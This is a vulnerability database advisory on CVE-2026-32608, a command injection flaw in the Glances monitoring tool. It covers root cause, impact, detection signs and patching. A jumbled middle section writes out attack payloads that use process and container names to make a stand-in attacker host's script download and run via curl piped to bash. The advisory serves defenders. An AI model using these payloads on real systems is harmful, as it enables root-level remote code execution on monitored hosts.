
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-32608 is an OS command injection vulnerability in Glances, an open-source cross-platform system monitoring tool, affecting all versions prior to 4.5.2. The flaw allows a local attacker who can control process names, container names, or filesystem mount points to inject arbitrary shell commands through admin-configured action command templates. It was published on March 14, 2026, and patched in version 4.5.2 released the same day. The vulnerability carries a CVSS v3.1 base score of 7.0 (High) (GitHub Advisory, Red Hat Bugzilla).
The root cause is CWE-78 (Improper Neutralization of Special Elements used in an OS Command). Glances allows administrators to configure action templates in glances.conf that execute shell commands when monitoring thresholds are exceeded, using Mustache template variables (e.g., {{name}}) populated with runtime data such as process names, container names, and mount points. The secure_popen() function in glances/secure.py attempts to avoid shell=True by manually splitting the command string on &&, |, and > characters before passing each segment to subprocess.Popen(shell=False). However, because Mustache rendering occurs before this splitting, an attacker who can control a monitored entity name (e.g., by naming a process or Docker container with embedded shell metacharacters) can cause secure_popen() to split the rendered command in unintended ways, executing attacker-supplied commands. Additionally, the > redirect handler writes output to arbitrary file paths, enabling arbitrary file write (GitHub Advisory, GitHub Commit).
Successful exploitation allows a low-privileged local user to execute arbitrary commands as the Glances process user, which is frequently root in full system monitoring deployments, effectively achieving privilege escalation. All three security dimensions are fully compromised: confidentiality (access to sensitive system data), integrity (arbitrary command and file write), and availability (ability to disrupt system operation). The arbitrary file write primitive via the > redirect handler in secure_popen further enables attackers to overwrite critical system files or plant malicious scripts (GitHub Advisory).
A proof-of-concept exploit with step-by-step attack scenarios is publicly available in the GitHub security advisory, demonstrating concrete payloads for both process name and container name injection vectors (GitHub Advisory). There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.018% (1st percentile), reflecting low near-term exploitation probability. Exploitation requires two preconditions: an admin-configured action template referencing user-controllable fields, and the attacker's ability to create processes or containers on the monitored system, which raises the attack complexity to High (GitHub Advisory).
glances.conf that reference user-controllable fields such as {{name}} (process name) or container name.[processlist]\ncritical_action=echo "ALERT: {{name}} used {{cpu_percent}}% CPU" >> /tmp/alerts.log.cp /bin/sleep "/tmp/innocent|curl attacker.com/evil.sh|bash"
"/tmp/innocent|curl attacker.com/evil.sh|bash" 9999 &secure_popen() splits the rendered command string on |, executing curl attacker.com/evil.sh and piping the result to bash as the Glances process user (often root).&&-chained commands:docker run --name "web && curl attacker.com/rev.sh | bash && echo " nginxWhen the container triggers a configured alert, secure_popen() splits on && and executes the injected curl ... | bash segment.> redirect handler (GitHub Advisory).curl, wget, bash, python) with unusual parent PIDs traceable to the Glances monitoring daemon.|, &&, >) visible in process listings (ps aux, /proc)./tmp/ or other world-writable directories, especially shell scripts or binaries with recent modification timestamps.critical_action) coinciding with process names containing special characters./var/log/auth.log) showing privilege escalation or unexpected sudo/su activity following Glances alert events.Upgrade Glances to version 4.5.2 or later, which introduces the _sanitize_mustache_dict() function in glances/actions.py that strips &&, |, >, and >> characters from all Mustache-rendered values before they are passed to secure_popen() (Glances Release, GitHub Commit). As a workaround prior to patching, avoid configuring action templates that reference user-controllable fields ({{name}}, {{mnt_point}}, container names), or replace inline shell operators in action templates with dedicated shell scripts called from the action. Additionally, run Glances with the minimum required privileges rather than as root to limit the impact of exploitation (GitHub Advisory).
Red Hat tracked the vulnerability via Bugzilla (Bug 2448562) and published a CVE advisory, indicating awareness among enterprise Linux distributors (Red Hat Bugzilla). Tenable added detection support via Nessus plugin 302883 shortly after disclosure. The vulnerability was noted on social media (Bluesky) and covered by security aggregators including CXSecurity and InfinitSec, though no major vendor statements or high-profile researcher commentary beyond the original advisory have been identified.
Fix availability across major Linux distributions and their releases.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."